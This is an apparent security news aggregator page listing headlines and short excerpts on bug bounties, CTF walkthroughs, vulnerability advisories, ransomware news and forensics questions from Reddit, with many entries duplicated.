    i am a new penetration tester and i want to gather some certifications for me to be able to further my career. however i have observed that cybersecurity certifications are particularly expensive, so like the Certified Ethical Hacker (CEH) certifcation costs 1200 USD which is a lot since i am planning to pay them by myself.. ​ i recently saw elearnsecurity , particularly the eJPT and it only costs 200 USD which i think is great since it shows that i have some real world and hands on capabilities as a penetration tester.. so are there any other certifications like the eJPT which is affordable and credible? preferrably around the same or better if lower price than the eJPT ​ thank you submitted by /u/darkalimdor18 [link] [comments]  ( 3 min )
    Book recommendations
    Looking for some good books to study up on foundational Network Concepts and maybe some stuff that could help me prepare for Network+ submitted by /u/Wintermane45 [link] [comments]
  • Open

    What makes a great incident response engineer?
    submitted by /u/Real_Score_5035 [link] [comments]  ( 1 min )
    QUESTION: confiscated phone asks to update whatsapp
    Good afternoon, My local department wants to manually check whatsapp messages on a phone. The phone has been in flight mode since we've confiscated it. We ran into the issue that when we want to launch whatsapp it asks to update the whatsapp software. If we want to do this this means that we'll have to hook it up to our wifi network. Does this mean that if the suspect has deleted his messages through whatsapp.web / other phone that this will also be synched with the whatsapp on the phone? I also believe that whatsapp is linked to a phone number. So it would rather be impossible for the suspect to get on his whatsapp without his sim-card(this is in our possesion as well). We also use the UFED cellebrite, but whatsapp conversations don't always come through. So what are our options to be able to get back into whatsapp without loss of data? ​ Thanks! submitted by /u/Tniso [link] [comments]  ( 1 min )
  • Open

    Adobe Patches Critical RCE Vulnerability in Magento2
    On Sunday, February 13th, Adobe pushed an emergency update to their Magento2 ecommerce software patching a critical unauthenticated remote code execution vulnerability. It is marked as CVE-2022-24086 with a CVSS score of 9.8. Website administrators of Magento stores should patch immediately. Shop owners of Magento 2.3 or 2.4 stores can find the patch to install here. Instructions on how to install Magento security patches via Composer can be found here. Our website firewall generic rules block RCE exploitation attempts by default but given the severity of the vulnerability website administrators should not leave their websites unpatched. Continue reading Adobe Patches Critical RCE Vulnerability in Magento2 at Sucuri Blog.
  • Open

    Lodestar Joins the Consensus Layer Bug Bounty
    ChainSafe is happy to announce that we’ve been added to the Ethereum Foundation’s consensus layer bug bounty program for Lodestar, our… Continue reading on ChainSafe »  ( 1 min )
    File Inclusion Vulnerabilities - Cyber Sapiens Internship Task-19
    Hello guys👋👋 ,Prajit here from the BUG XS Team and Cyber Sapiens United LLP Cybersecurity and Red Team Intern, in this I am regularly… Continue reading on Medium »  ( 2 min )
    Insecure Direct Object Reference- Cyber Sapiens Internship Task-18
    Hello guys👋👋 ,Prajit here from the BUG XS Team and Cyber Sapiens United LLP Cybersecurity and Red Team Intern, in this I am regularly… Continue reading on Medium »  ( 4 min )
    No Rate Limiting Vulnerability & Bypasses - Cyber Sapiens Internship Task-17
    Hello guys👋👋 ,Prajit here from the BUG XS Team and Cyber Sapiens United LLP Cybersecurity and Red Team Intern, in this I am regularly… Continue reading on Medium »  ( 2 min )
    Directory Listing Vulnerability - Cyber Sapiens Internship Task-16
    Hello guys👋👋 ,Prajit here from the BUG XS Team and Cyber Sapiens United LLP Cybersecurity and Red Team Intern, in this I am regularly… Continue reading on Medium »  ( 3 min )
    Bug Report; Bypassing Weekly Limits In Basic (Free) LinkedIn Account
    Publishing my first Security Vulnerability report for LinkedIn.Below is the report that I have submitted to LinkedIn Information Security… Continue reading on Medium »  ( 2 min )
    Hacked Dutch Government Website. All I got was this l̶o̶u̶s̶y̶ cool T-Shirt.
    They are right. Persistence is the key ! Continue reading on Medium »  ( 1 min )
    What is CSRF Attack ?
    Cross-Site Request Forgery (CSRF) is an attack that forces authenticated users to submit a request to a Web application against which they… Continue reading on Medium »  ( 2 min )
    My First Reflected XSS Bug Bounty — Google Dork — $xxx
    Today I will share a Reflected XSS vulnerability that was reported by me and i found this with google dorks… Continue reading on InfoSec Write-ups »  ( 3 min )
    ImmuneFi y Octopus Network Lanzan Jugoso Bug Bounty
    Octopus Network 🐙 Continue reading on Medium »  ( 3 min )
  • Open

    ‘Ice phishing’ on the blockchain
    submitted by /u/SCI_Rusher [link] [comments]
  • Open

    SecWiki News 2022-02-16 Review
    今日暂未更新资讯~ 更多最新文章,请访问SecWiki  ( 2 min )
    SecWiki News 2022-02-16 Review
    今日暂未更新资讯~ 更多最新文章,请访问SecWiki  ( 2 min )
  • Open

    Machine Learning Enrichment in your Data Asset Production Flow
    How discursus tackled the challenge of introducing ML enrichments in data asset production flows, using Dagster, dbt and Novacene AI. Continue reading on discursus.io »  ( 5 min )
    Power of Reverse Image Search — OSINT Challenge 16
    On Dec 22, 2021, Quiztime (contributor @twone2) shared a new OSINT quiz with us. Continue reading on Medium »  ( 1 min )
  • Open

    如何做好安全研发人才招聘之如何招人
    人是很顽固的一种生物,大部分人成年以后很难改变固有的思维定势。从这个角度来讲,选拔的重要性大于培养。
    “大规模混合战争”阴影下的乌克兰
    “开战日”,cctv13 播报中没有出现大规模战争的血腥画面,俄乌双方似乎都陷入了静默的状态。  ( 1 min )
    FreeBuf早报 | 乌军事机构和银行受网络攻击;新加坡将推出强有力的反诈骗措施
    从2022年2月15日下午开始,乌克兰国防部和武装部队以及国有银行遭到DDoS攻击  ( 1 min )
    线上+线下全覆盖!CIS 2021大会·春日版「新玩法」抢先揭秘
    各位FreeBuf的新老朋友大家好,CIS 2021议题来啦~  ( 1 min )
    啪啪打脸,国际互联网协会数据泄露
    作为互联网世界相关标准的制定、推广的机构,以推动互联网的发展为己任,却也因为网络安全漏洞出现信息被泄露事件,让人颇感尴尬。  ( 1 min )
    Yak基础插件案例——CDN检测
    内容分发网络(CDN)是指一种透过互联网互相连接的电脑网络系统,本文从CDN以及CDN的配置先说起,详解Yak基础插件案例。  ( 3 min )
    新型勒索病毒Coffee潜伏期高达百日,360解密大师独家支持解密
    近日,360安全大脑监测发现一种具有蠕虫性质的新型勒索病毒Coffee存在大范围传播的风险。
    调查显示,零信任战略受到 CSO 好评
    实施零信任是作为降低网络风险的有效方式。  ( 1 min )
    Swissport遭受BlackCat勒索攻击
    瑞士Swissport空港服务公司遭勒索软件攻击,一度导致航班延误和服务中断。
    乌克兰银行和军事机构遭受了DDoS攻击
    昨日下午,乌克兰国防部和武装部队,以及该国的两家国有银行受到了分布式拒绝服务(DDoS)的攻击。
    跳槽被公司无死角监控?这个盖子终于捂不住了
    伴随着国内相关法律法规的落地和民众隐私保护意识的觉醒,这个盖子终于捂不住了。当盖子被掀开时,我们需要重新审视这个问题。  ( 1 min )
  • Open

    The Ultimate Secret To Red Team Engagements
    The key to a successful engagement is well-coordinated planning and communication through all parties involved. This blog post would focus… Continue reading on Medium »  ( 1 min )
    Here is how you can become an ethical hacker
    Ethical hackers are experienced professionals who find exploitable bugs and report to increase the cybersecurity posture of an… Continue reading on Medium »  ( 1 min )
  • Open

    Windows Privilege Escalation: SpoolFool
    Introduction Oliver Lyak posted a write-up about a Windows Privilege Escalation vulnerability that persisted in Windows systems even after patching of previous vulnerabilities in Print The post Windows Privilege Escalation: SpoolFool appeared first on Hacking Articles.  ( 8 min )
  • Open

    Windows Privilege Escalation: SpoolFool
    Introduction Oliver Lyak posted a write-up about a Windows Privilege Escalation vulnerability that persisted in Windows systems even after patching of previous vulnerabilities in Print The post Windows Privilege Escalation: SpoolFool appeared first on Hacking Articles.  ( 8 min )
  • Open

    My First Reflected XSS Bug Bounty — Google Dork — $xxx
    Today I will share a Reflected XSS vulnerability that was reported by me and i found this with google dorks… Continue reading on InfoSec Write-ups »  ( 3 min )
    Walkthrough — Hacktoria: Geolocation 11
    Once again I am back with a walkthrough to a GEOINT challenge. I will be explaining how to solve Geolocation 11 practice test on…  ( 6 min )
    SHODAN is the true Internet search engine — Here’s why?
    Unlike Google, which scans only for ports 80 & 443, Shodan is the true… Continue reading on InfoSec Write-ups »  ( 3 min )
    PRACTICAL MALWARE ANALYSIS LAB PART — I
    This lab uses the files Lab01–01.exe and Lab01–01.dll. Use the tools and tech- niques described in the chapter to gain information about…  ( 5 min )
    Attack Surface Monitoring using Open-Source Intelligence
    The paper introduces the case study for attack surface analysis and monitoring with practical application of open-source intelligence…  ( 9 min )
    TryHackMe: Team
    Walk-Through  ( 4 min )
  • Open

    My First Reflected XSS Bug Bounty — Google Dork — $xxx
    Today I will share a Reflected XSS vulnerability that was reported by me and i found this with google dorks… Continue reading on InfoSec Write-ups »  ( 3 min )
    Walkthrough — Hacktoria: Geolocation 11
    Once again I am back with a walkthrough to a GEOINT challenge. I will be explaining how to solve Geolocation 11 practice test on…  ( 6 min )
    SHODAN is the true Internet search engine — Here’s why?
    Unlike Google, which scans only for ports 80 & 443, Shodan is the true… Continue reading on InfoSec Write-ups »  ( 3 min )
    PRACTICAL MALWARE ANALYSIS LAB PART — I
    This lab uses the files Lab01–01.exe and Lab01–01.dll. Use the tools and tech- niques described in the chapter to gain information about…  ( 5 min )
    Attack Surface Monitoring using Open-Source Intelligence
    The paper introduces the case study for attack surface analysis and monitoring with practical application of open-source intelligence…  ( 9 min )
    TryHackMe: Team
    Walk-Through  ( 4 min )
  • Open

    My First Reflected XSS Bug Bounty — Google Dork — $xxx
    Today I will share a Reflected XSS vulnerability that was reported by me and i found this with google dorks… Continue reading on InfoSec Write-ups »  ( 3 min )
    Walkthrough — Hacktoria: Geolocation 11
    Once again I am back with a walkthrough to a GEOINT challenge. I will be explaining how to solve Geolocation 11 practice test on…  ( 6 min )
    SHODAN is the true Internet search engine — Here’s why?
    Unlike Google, which scans only for ports 80 & 443, Shodan is the true… Continue reading on InfoSec Write-ups »  ( 3 min )
    PRACTICAL MALWARE ANALYSIS LAB PART — I
    This lab uses the files Lab01–01.exe and Lab01–01.dll. Use the tools and tech- niques described in the chapter to gain information about…  ( 5 min )
    Attack Surface Monitoring using Open-Source Intelligence
    The paper introduces the case study for attack surface analysis and monitoring with practical application of open-source intelligence…  ( 9 min )
    TryHackMe: Team
    Walk-Through  ( 4 min )
  • Open

    Almost every publicly available CVE PoC
    Article URL: https://github.com/trickest/cve Comments URL: https://news.ycombinator.com/item?id=30357373 Points: 104 # Comments: 14  ( 3 min )
  • Open

    Termux Apps Vulnerability Disclosures
    Article URL: https://termux.github.io/general/2022/02/15/termux-apps-vulnerability-disclosures.html Comments URL: https://news.ycombinator.com/item?id=30357335 Points: 2 # Comments: 0  ( 9 min )
  • Open

    How can I download a React site to edit it locally?
    I have done this before with wget and had no problems, however, I am trying to download this react app and am having a very hard time. For some reason it is only downloading the index.html page and when I click on another tab I get "GET /example" Error (404): "Not found" However, when I run wget on the /example page and grab example.html then it works, but this is not feasible for every page that I need to run. I am calling: wget --random-wait -r -p -e robots=off -U mozilla https://example.com What am I doing wrong / is there a better tool to do this? The site is hosted on Vercel and uses the Next.js framework Any help is much appreciated :) submitted by /u/tokentrader [link] [comments]  ( 2 min )
  • Open

    黑客组织 TA2541 解析
    译者:知道创宇404实验室翻译组 原文链接:https://www.proofpoint.com/us/blog/threat-insight/charting-ta2541s-flight 主要发现 Proofpoint研究人员多年来一直在追踪一个针对航空、航天、交通、制造业和国防工业的持续网络犯罪者。 黑客者一贯使用远程访问木马(rat) ,可用于远程控制受到感染的机器。 黑客关注了与...
    黑客组织 TA2541 解析
    译者:知道创宇404实验室翻译组 原文链接:https://www.proofpoint.com/us/blog/threat-insight/charting-ta2541s-flight 主要发现 Proofpoint研究人员多年来一直在追踪一个针对航空、航天、交通、制造业和国防工业的持续网络犯罪者。 黑客者一贯使用远程访问木马(rat) ,可用于远程控制受到感染的机器。 黑客关注了与...
  • Open

    黑客组织 TA2541 解析
    译者:知道创宇404实验室翻译组 原文链接:https://www.proofpoint.com/us/blog/threat-insight/charting-ta2541s-flight 主要发现 Proofpoint研究人员多年来一直在追踪一个针对航空、航天、交通、制造业和国防工业的持续网络犯罪者。 黑客者一贯使用远程访问木马(rat) ,可用于远程控制受到感染的机器。 黑客关注了与...
    黑客组织 TA2541 解析
    译者:知道创宇404实验室翻译组 原文链接:https://www.proofpoint.com/us/blog/threat-insight/charting-ta2541s-flight 主要发现 Proofpoint研究人员多年来一直在追踪一个针对航空、航天、交通、制造业和国防工业的持续网络犯罪者。 黑客者一贯使用远程访问木马(rat) ,可用于远程控制受到感染的机器。 黑客关注了与...

  • Open

    Why would a civilian private network be using an public IP range internally for device assignments (military netblock at that)?
    I was visiting a popular big box store today and was looking at one of their WiFi printers and saw this: https://imgur.com/a/fTZ1Emc Any idea why they are using a public ip range instead of something internal like 192, 172, 10 etc for IP assignments? The netblock according to ARIN belongs to the DoD (https://whois.domaintools.com/7.117.1.1) Just to make sure it wasn't a fluke, I also looked at another device on their network which also had a 7.117 IP. I just thought it was very strange. Any ideas? submitted by /u/LyleTillman [link] [comments]  ( 2 min )
    What's the Biggest Turn Off in Regards to Offensive Frameworks?
    I'm referring to software such is Metasploit, CobaltStrike, Armitage, Ramcos, etc.... submitted by /u/Blagojee [link] [comments]  ( 1 min )
    Burp Suite certificate question
    I was wondering if anyone has recently done their burp suite practioner exam cert recently and how relatable it is to their practice test? Is burp suite pro REALLY necessary for the test? Just curious because it's for work and I don't want to pay for pro to not use it. My work has boxes setup with pro so my personal liscense won't be utilized except for the test. submitted by /u/phishingsudo [link] [comments]  ( 1 min )
    Is it possible to route ALL traffic from an idevice through a VPN?
    I'm somewhat new to idevice admin, so please excuse any ignorance. Is it possible to route literally ALL packets from an iPhone through a VPN? We're trying to get some stuff set up and we implemented a VPN by way of a user-installable app. Unfortunately it seems that on iOS there are a lot of connections that bypass this. For example when first connected to a wifi network the iPhone spams a flurry of connections to Apple's servers which don't go through the VPN. I've confirmed this by creating an "evil" wifi network that supports ipv4 only and blocks any connections to the 17.x.x.x range (which is wholly owned and operated by Apple), and even with the VPN active the logs show hundreds of connection attempts persistently. If I also block all Apple domains then half the stuff on the phone no longer works. App-based connections are routed correctly (Safari, etc), but the phone completely ignores the VPN for both DNS lookups and the connections themselves when it comes to system stuff and I'm not sure why. From my research it seems that maybe we need to ditch the app idea and instead implement an "always on" VPN by way of a mobileconfig file. This appears to require the iPhones to be supervised through MDM, which isn't a problem. I've taken a test phone, wiped and supervised it, but I'm having trouble figuring out how to create a mobileconfig that does what we want. Before I burn too many hours messing with this I'm wondering if anyone can help with the following two questions: Will an "always on" VPN on an iPhone actually route ALL packets through the VPN (including the system level phone-home initialization stuff, DNS lookups, ntp, etc) or is this not even the right approach? Assuming (1) is the correct approach, can someone point me to an example mobileconfig file that implements this so I can look at the structure and have a better idea of what I'm doing? submitted by /u/sneakertech [link] [comments]  ( 2 min )
    What are my options for an encrypted bootable flash drive containing 2 Linux OS, selection of which would be done by password alone at the bootloader / pre-boot stage.
    I want an encrypted bootable flash drive which contains 2 LINUX OS. The existence of either OS should be impossible to determine without a password. The flash drive should boot to a BOOTLOADER password prompt. Entering a wrong password should do nothing Entering password A should boot OS A Entering password B should boot OS B After boot of A, it should not be possible to prove the existence of B After boot of B, it should not be possible to prove the existence of A (i.e. if, by booting one of the OS, it is then possible to see that half the flash drive is 'unallocated' then we have probably failed our task) You're already thinking 'plausible deniability' is the phrase im looking for. Yes you're right - thats exactly what I want. I want what Veracrypt can do, but I want it for Linux, not Windows. Is it possible? I've looked at LUKS, but I dont see that it can do what I want. Thanks for any suggestions. submitted by /u/boli99 [link] [comments]  ( 1 min )
    Is law enforcement/fed/military experience pretty much mandatory to become good at DFIR?
    We can say you can self study, learn all the material, join a SOC and pray for a promotion, get certifications, etc. I don't see a whole ton of jobs open for DFIR without explicit mention of tools, processes, and experience that one would have to accumulate in one of those sectors that isn't gated by 5-10 years of experience doing it. Additionally, it seems to me that most of the people who are pumping out books and learning material come from some kind of government background where they did incident response. Almost all hiring managers I've met have significant LE experience behind them. What I see much more of is people without this govt background going into pentesting, policy work, etc. Are you pretty much screwed for getting into DFIR at a large corp without a three letter agency or military on the resume? submitted by /u/Different-Area-3053 [link] [comments]  ( 2 min )
    Forensics Toolkits Recommendations? GCP Linux VM may have been compromised and use for crypto mining :/
    Hey y'all! I have a VM that was flagged by Google for potential compromise and being used for crypto mining (the CPU was flat out 50%, continuously for last several days). I immediately took down the machine, snapshotted and imaged it; rotated all security keys for GCP account. I don't think there is any nefarious activity and the compromise was likely to this one machine (or maybe I think that). I would like to find a tool that can show me last logins, various logs, any suspicious software etc. so that I can start digging or escalate. What tools, if any, would you recommend? I have been running individual commands like last, utmpdump, scrubbing logs manually but I figured there has to be a tool to make this easy. submitted by /u/sidgup [link] [comments]  ( 2 min )
  • Open

    H1.Jack, The Game
    As crazy as it sounds, we’re releasing a casual free-to-play mobile auto-battler for Android and iOS. We’re not changing line of business - just having fun with computers! We believe that the greatest learning lessons come from outside your comfort zone, so whether it is a security audit or a new side hustle we’re always challenging ourself to improve the craft. During the fall of 2019, we embarked on a pretty ambitious goal despite the virtually zero experience in game design. We partnered with a small game studio that was just getting started and decided to combine forces to design and develop a casual mobile game set in the *cyber* space. After many prototypes and changes of direction, we spent a good portion of 2020 spare time to work on the core mechanics and graphics. Unfortunately, the limited time and budget further delayed beta testing and the final release. Making a game is no joke, especially when it is a combined side project for two thriving businesses. Despite all, we’re happy to announce the release of H1.Jack for Android and iOS as a free-to-play with no advertisement. We hope you’ll enjoy the game in between your commutes and lunch breaks! Android: https://play.google.com/store/apps/details?id=com.CobbleGames.Hijack iOS (iPhone and iPad) https://apps.apple.com/app/hijack-game/id1517609205 No malware included. H1.Jack is a casual mobile auto-battler inspired by cyber security events. Start from the very bottom and spend your money and fame in gaining new techniques and exploits. Heartbleed or Shellshock won’t be enough! While playing, you might end up talking to John or Luca. Our monsters are procedurally generated, meaning there will be tons of unique systems, apps, malware and bots to hack. Battle levels are also dynamically generated. If you want a sneak peek, check out the trailer:  ( 1 min )
  • Open

    How do I secure WordPress Websites for Free?
    Protecting Content Management Systems (CMS) installed on a hosting server is crucial in today’s ever-growing world wide web, but how to I protect my WordPress website on a tight budget? There are tons of options available on this front, but it can be overwhelming to make the right decision in website protection that fits into your budget. In this article, however, we’ll be covering the basics of efficiently securing your WordPress website at no cost.  Continue reading How do I secure WordPress Websites for Free? at Sucuri Blog.
  • Open

    ImmuneFi Bug Bounty Launched!
    Octopus Network is a brand new multichain network born to serve application-specific blockchains, aka appchains. Octopus Network provides… Continue reading on Octopus Network »  ( 2 min )
    Yet another enumeration of subdomains with statistics
    Or how to collect million of bugbounty subdomains in order to make a few wordlists. Continue reading on Medium »  ( 1 min )
    Do you want to start your career in Cyber Security — Read This .
    Cyber Security - Learn hack Secure. Continue reading on Medium »  ( 3 min )
    100 Days of Hacking — Day 10
    What’s up guys it’s the 10th day of #100DaysofHacking. 10% of the goal is achieved let’s go through today’s objectives and report Continue reading on Medium »  ( 2 min )
    Bug Bounty Stress aka Burnout: do and don’t
    Don’t stress yourself too much! Continue reading on Medium »  ( 3 min )
    HigherLogic RCE In _VSTATE .NET
    Remote code execution (RCE) is a class of software security flaws/vulnerabilities. RCE vulnerabilities will allow a malicious actor to… Continue reading on Medium »  ( 1 min )
    PORTSWIGGER WEB SECURITY - FILE UPLOAD LAB ÇÖZÜMLERİ
    File Upload (Dosya Yükleme), kullanıcının bir web sunucusuna dosya yüklemesine denir. Web sayfaları kullanıcıdan dosya yüklemesi için… Continue reading on Medium »  ( 10 min )
    Jax.Money testing: rewards up to $20,000 and more!
    by Ramyata Rao, Digital Marketing Manager at Jax.Network Continue reading on Jax.Network Blog »  ( 4 min )
    ​​How Did I Start Doing Bug Bounty?
    Since school, I have been reading Hacker (the Russian offensive security magazine) when I had the opportunity to buy it (then it was still… Continue reading on Medium »  ( 2 min )
    Bug Bounty: Low Hanging Fruit
    Low-hanging fruit are bugs that are very easy to find. I would divide them into 2 more types. Continue reading on Medium »  ( 1 min )
  • Open

    A technique to semi-automatically discover new vulnerabilities in WordPress plugins
    submitted by /u/kazetkazet [link] [comments]
    GoIP-1 GSM gateway could be harnessed for phone fraud by hackers
    submitted by /u/ValtteriLe [link] [comments]
    Dependabot alternative for Clojure
    submitted by /u/mthbernardes [link] [comments]
    CVE-2021-44521 – Exploiting Apache Cassandra User-Defined Functions for Remote Code Execution
    submitted by /u/SRMish3 [link] [comments]
    A CLI SAST (Static application security testing) tool which was built with the intent of finding vulnerable Clojure code via rules that use a simple pattern language.
    submitted by /u/mthbernardes [link] [comments]  ( 1 min )
    merOS-virt - Build and Interact with a Set of Virtual Machines.
    submitted by /u/AranAilbhe [link] [comments]  ( 2 min )
    Advisory: Western Digital My Cloud Pro Series PR4100 RCE
    submitted by /u/g_e_r_h_a_r_d [link] [comments]  ( 1 min )
  • Open

    Horizontall HackTheBox Walkthrough
    Introduction Horizontall is an “easy” rated CTF Linux box on Hack The Box platform. The box covers initial compromise by exploiting Strapi RCE vulnerability and The post Horizontall HackTheBox Walkthrough appeared first on Hacking Articles.  ( 6 min )
  • Open

    Horizontall HackTheBox Walkthrough
    Introduction Horizontall is an “easy” rated CTF Linux box on Hack The Box platform. The box covers initial compromise by exploiting Strapi RCE vulnerability and The post Horizontall HackTheBox Walkthrough appeared first on Hacking Articles.  ( 6 min )
  • Open

    Google Rewards Indian Techie With $8.7M in vulnerability rewards
    Article URL: https://www.indiatimes.com/technology/news/google-thanks-indian-researcher-android-chrome-bug-561975.html Comments URL: https://news.ycombinator.com/item?id=30349459 Points: 9 # Comments: 1  ( 2 min )
  • Open

    An OSINT Path — In TryHackMe
    Hello Friends, Continue reading on Medium »  ( 1 min )
    Honeypot — Seoul, South Korea (Threat Analysis)
    안녕하세요! Continue reading on Medium »  ( 5 min )
    TryHackMe Sakura Room CTF Write-Up
    My wired, unexplainable urge to get OSINT Dojo's Student Rank Badge has led me to this CTF, and now that I'm here, I realize that I can… Continue reading on Medium »  ( 4 min )
    Hacktoria: Geolocation 13 (Walkthrough)
    Hacktoria: Geolocation 13 (Walkthrough) Continue reading on Medium »  ( 1 min )
  • Open

    Work From Home Productivity Tips
    For many of us, working from home is here to stay, but it does come with its own challenges. This article contains some of the best tips and tricks from TrustedSec consultants on how to stay focused at home. Set an alarm to start and stop working Alarms can be set in shorter intervals, to... The post Work From Home Productivity Tips appeared first on TrustedSec.  ( 3 min )
  • Open

    SecWiki News 2022-02-15 Review
    终极Java反序列化Payload缩小技术 by ourren 求解网络安全问题的可解释机器学习 by ourren 从一例 Pegasus 误报说开去 by Avenger 绕过污点分析的一些思考 by ourren 2021网络金融黑产研究报告 by ourren 更多最新文章,请访问SecWiki  ( 2 min )
    SecWiki News 2022-02-15 Review
    终极Java反序列化Payload缩小技术 by ourren 求解网络安全问题的可解释机器学习 by ourren 从一例 Pegasus 误报说开去 by Avenger 绕过污点分析的一些思考 by ourren 2021网络金融黑产研究报告 by ourren 更多最新文章,请访问SecWiki  ( 2 min )
  • Open

    Question: Different imaging tools for acquisition
    I'm very new to computer forensics. Right now I'm exploring different data acquisition tools. I tried to image a usb device using FTK Imager (on a Windows system) and dd from the SIFT workstation (linux). I noticed that: 1. These two imaging tools provide image data of different sizes. 2. FTK automatically verifies the hash of the device and the image - both hashes were the same. 3. For the dd image, I verified it by myself and they were the same. I have few questions: 1. Why is the hash of the same device different on FTK (running on windows) and when checking on the SIFT Workstation (linux) ? 2. If different tools provide different images, do analysts use a combination of multiple tools? 3. I read about write blockers, I did not use one while imaging, could the difference be because of this? I'd be grateful if you could help me understand more about this process by answering my questions or sharing more resources that I could use. Thanks! submitted by /u/nybble04 [link] [comments]  ( 4 min )
    Overview of autopsy data artifacts, analysis results, and reporting. Part 2 of the autopsy series. nmap usage investigation as a case study.
    submitted by /u/DFIRScience [link] [comments]  ( 1 min )
    iCloud forensics
    Anyone has any experience recovering permanently deleted iCloud data using Cellebrite? Or any other forensic tools ? submitted by /u/Techn0prince [link] [comments]  ( 2 min )
    ENCE Certification
    Hi all, My Ence cert is up in April 22 and I would like to maintain accreditation. Unfortunately my role has a focus towards E-Discovery and not so much digital forensics so I may struggle to get aid from my employer re training and financing. Anyone have experience renewing? Are there any requirements for renewal? As I am likely having to purchase the training myself I don't want the training to be too expensive (particularly as it's not a skill I use day to day). I would likely benefit the most from Cellebrite or AXIOM training. TIA submitted by /u/Genzlol [link] [comments]  ( 1 min )
  • Open

    New Emotet Infection Method
    A new Emotet infection method uses an obfuscated Excel 4.0 macro that, when activated, leads to the retrieval and execution of the final Emotet payload. The post New Emotet Infection Method appeared first on Unit42.
  • Open

    专访极盾技术总监郑冬东:大火的XDR能给企业带来什么?
    XDR安全技术的魅力究竟在哪里,被众人寄予厚望的XDR技术能否解决哪些难题?  ( 1 min )
    FreeBuf早报 | 美国关基组织又遭勒索软件入侵;欧洲央行要求各银行加强网络防御
    在乌克兰危机加剧之际,欧洲央行警告各银行可能受到与俄罗斯有关的网络攻击,要求各银行加强网络防御。  ( 1 min )
    2021 网络金融黑产研究报告
    随着新一轮金融科技的发展与产业的变革,金融行业加快了数字化转型的步伐,灵活与便捷的金融业务模式在为用户提供更加优质的金融服务的同时,也面临着来自黑产不断演变迭代的各类新型攻击威胁。  ( 1 min )
    美国一公司暴露了 700 万用户数据
    一个存在安全风险的Amazon S3存储桶中,包含约700万人的个人数据信息。  ( 1 min )
    体育品牌美津浓遭勒索软件攻击致订单延期
    运动设备与服装品牌美津浓(Mizuno)在2月4日遭受了一次勒索软件攻击。这次攻击严重地导致公司业务中断。
    欧洲最大汽车经销商遭遇勒索攻击、谷歌紧急修复零日漏洞|2月15日全球网络安全热点
    欧洲最大的汽车经销商之一埃米尔·弗雷(Emil Frey)上个月遭到勒索软件攻击,这家瑞士公司于2月1日出现在Hive勒索软件的受害者名单上。  ( 1 min )
    关于CIS 2021 Spring·春日版活动形式调整的公告
    结合线下与线上新玩法,CIS 2021春日版与您不见不散。  ( 1 min )
    《网络安全审查办法》今日施行,百万信息级平台国外上市需审查
    新修订的《网络安全审查办法》以关键信息基础设施的供应链安全为核心,重点加强对数据安全的关注和规范。
    谷歌Chrome紧急修复了在攻击中被利用的零日漏洞
    Google发布了适用于Windows、Mac和Linux的Chrome,以修复威胁参与者在攻击中使用的高严重性零日漏洞。
    CISA 在其已知利用漏洞目录中新增15个新漏洞
    美国网络安全与基础设施安全局(CISA)在“已知被利用漏洞目录”中又增加了15个漏洞。  ( 1 min )
    FBI:BlackByte 勒索软件已入侵美国关键基础设施
    美国联邦调查局与美国特勤局发布联合网络安全咨询公告,显示BlackByte 勒索软件组织在过去3个月中入侵了至少3 个美国关键基础设施。  ( 1 min )
  • Open

    Cross-origin resource sharing
    Showmax disclosed a bug submitted by qualin: https://hackerone.com/reports/1478449 - Bounty: $50
    When sharing a Deck card in conversation the metaData can be manipulated to open arbitrary URL
    Nextcloud disclosed a bug submitted by ctulhu: https://hackerone.com/reports/1358977 - Bounty: $100
    Ability to Disable the Login Attempt of any Shopify Owner for 24 hrs (Zero_Click)
    Shopify disclosed a bug submitted by saurabhsankhwar3: https://hackerone.com/reports/1406495 - Bounty: $900
  • Open

    JDBC Connection URL 攻击
    作者:su18 本文为作者投稿,Seebug Paper 期待你的分享,凡经采用即有礼品相送! 投稿邮箱:paper@seebug.org 当一个 JDBC 连接 URL 可控时,能造成什么影响?相关的若干攻击方法已经被披露很长时间了,但是我还一直都没有学习,随着 HITB2021SIN 中的分享议题 "Make JDBC Attacks Brilliant Again" 的视频上传到了 Y...
    JDBC Connection URL 攻击
    作者:su18 本文为作者投稿,Seebug Paper 期待你的分享,凡经采用即有礼品相送! 投稿邮箱:paper@seebug.org 当一个 JDBC 连接 URL 可控时,能造成什么影响?相关的若干攻击方法已经被披露很长时间了,但是我还一直都没有学习,随着 HITB2021SIN 中的分享议题 "Make JDBC Attacks Brilliant Again" 的视频上传到了 Y...
    RedLine Stealer 伪装成 Windows 11 更新程序,窃取用户信息
    译者:知道创宇404实验室翻译组 原文链接:https://threatresearch.ext.hp.com/redline-stealer-disguised-as-a-windows-11-upgrade/ 黑客总是在寻找热门诱饵,以诱骗受害者进入感染系统。我们最近分析了一个这样的诱饵,即一个伪造的 Windows 11安装程序。2022年1月27日,也就是 Windows 11升级最...
    RedLine Stealer 伪装成 Windows 11 更新程序,窃取用户信息
    译者:知道创宇404实验室翻译组 原文链接:https://threatresearch.ext.hp.com/redline-stealer-disguised-as-a-windows-11-upgrade/ 黑客总是在寻找热门诱饵,以诱骗受害者进入感染系统。我们最近分析了一个这样的诱饵,即一个伪造的 Windows 11安装程序。2022年1月27日,也就是 Windows 11升级最...
  • Open

    JDBC Connection URL 攻击
    作者:su18 本文为作者投稿,Seebug Paper 期待你的分享,凡经采用即有礼品相送! 投稿邮箱:paper@seebug.org 当一个 JDBC 连接 URL 可控时,能造成什么影响?相关的若干攻击方法已经被披露很长时间了,但是我还一直都没有学习,随着 HITB2021SIN 中的分享议题 "Make JDBC Attacks Brilliant Again" 的视频上传到了 Y...
    JDBC Connection URL 攻击
    作者:su18 本文为作者投稿,Seebug Paper 期待你的分享,凡经采用即有礼品相送! 投稿邮箱:paper@seebug.org 当一个 JDBC 连接 URL 可控时,能造成什么影响?相关的若干攻击方法已经被披露很长时间了,但是我还一直都没有学习,随着 HITB2021SIN 中的分享议题 "Make JDBC Attacks Brilliant Again" 的视频上传到了 Y...
    RedLine Stealer 伪装成 Windows 11 更新程序,窃取用户信息
    译者:知道创宇404实验室翻译组 原文链接:https://threatresearch.ext.hp.com/redline-stealer-disguised-as-a-windows-11-upgrade/ 黑客总是在寻找热门诱饵,以诱骗受害者进入感染系统。我们最近分析了一个这样的诱饵,即一个伪造的 Windows 11安装程序。2022年1月27日,也就是 Windows 11升级最...
    RedLine Stealer 伪装成 Windows 11 更新程序,窃取用户信息
